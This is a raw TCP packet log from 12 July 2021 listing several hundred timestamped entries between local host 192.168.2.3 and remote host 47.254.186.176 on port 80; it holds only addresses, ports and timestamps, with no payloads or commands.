Jul 12, 2021 10:29:49.658710003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.658720016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.658744097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.658750057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.658771038 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.658818007 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.658895016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659106970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659434080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659482956 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659507990 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659528971 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659539938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659562111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659596920 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659650087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659671068 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659693003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659714937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659725904 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659749985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659792900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659813881 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659832954 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659853935 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659863949 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659885883 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659895897 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659918070 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659944057 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.659950018 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.659993887 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660520077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660548925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660571098 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660594940 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660607100 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660629034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660651922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660664082 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660687923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660698891 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660718918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660739899 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660758972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660768032 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660792112 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660820007 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660830021 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660852909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660862923 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660886049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660913944 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.660928965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.660953045 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661003113 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661503077 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661526918 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661549091 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661569118 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661581993 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661602974 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661612034 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661634922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661658049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661679983 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661704063 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661710978 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661727905 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661740065 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661760092 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661781073 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661799908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661808968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661830902 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.661842108 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661865950 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.661916971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662180901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662228107 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662343025 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662369013 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662391901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662417889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662539959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662611008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662632942 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662657976 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662678003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662736893 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662797928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662839890 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.662926912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662946939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662981033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.662993908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663058996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663081884 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663129091 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663152933 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663175106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663192987 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663219929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663249016 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663352966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663374901 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663395882 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663422108 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663439989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663465977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663556099 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663608074 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663630962 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663652897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663676977 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663682938 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663702965 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663712978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663733959 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663753033 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663778067 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663788080 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663810968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663820982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663846016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663872004 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.663929939 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.663975000 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664278984 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664313078 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664336920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664359093 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664371014 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664393902 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664407969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664431095 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664458036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664482117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664493084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664519072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664531946 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664551973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664572001 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664594889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664618015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664624929 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664642096 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664654016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664676905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664702892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664710045 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664731979 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664756060 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664768934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664791107 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664800882 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.664820910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.664860010 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665349960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665383101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665405035 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665431976 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665440083 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665465117 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665477991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665498972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665525913 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665550947 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665571928 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665582895 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665601969 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665615082 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665635109 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665666103 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665676117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665699005 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665719032 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665745020 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665752888 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665771008 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665786028 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665811062 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665836096 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665851116 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665879011 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.665887117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.665970087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666086912 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666095972 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666304111 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666330099 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666363955 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666373968 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666398048 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666420937 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666440964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666450977 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666469097 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666482925 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666572094 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666610956 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666696072 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666721106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666750908 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666771889 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666795015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666820049 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666840076 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666851997 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666867971 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666882992 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666904926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666929960 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666953087 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.666964054 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666980028 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.666997910 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667022943 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667043924 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667064905 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667077065 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667093992 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667107105 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667149067 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667159081 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667181015 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667201996 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667223930 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667256117 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667289019 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667407036 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667692900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667718887 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667742014 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667769909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667778015 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667808056 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667814970 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667838097 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667862892 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667886972 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667901039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667920113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667928934 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.667948008 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667968988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.667979002 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668001890 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668015003 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668039083 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668065071 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668083906 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668106079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668114901 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668138027 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668148041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668169975 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668179035 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668203115 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668260098 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668368101 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668675900 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668709993 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668740034 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668746948 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668771982 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668783903 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668809891 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668838978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668864012 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668874025 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.668898106 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668929100 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.668939114 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669028044 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669049978 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669076920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669089079 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669114113 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669121027 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669141054 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669162989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669183969 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669200897 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669215918 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669234037 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669256926 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669265985 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669270039 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669291973 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669313908 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669337988 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669348001 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669368029 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669380903 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669404030 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669429064 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669444084 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669461966 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669487953 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669763088 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669810057 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669846058 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669872046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669897079 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669924021 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669931889 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669956923 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.669985056 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.669996023 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670022964 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670037031 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670059919 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670084953 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670106888 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670131922 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670139074 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670161963 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670171022 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670192003 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670206070 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670223951 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670245886 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670270920 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670294046 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670304060 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670325041 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670332909 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670356989 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670377016 CEST	80	49755	47.254.186.176	192.168.2.3
Jul 12, 2021 10:29:49.670387983 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670428991 CEST	49755	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:29:49.670824051 CEST	80	49755	47.254.186.176	192.168.2.3
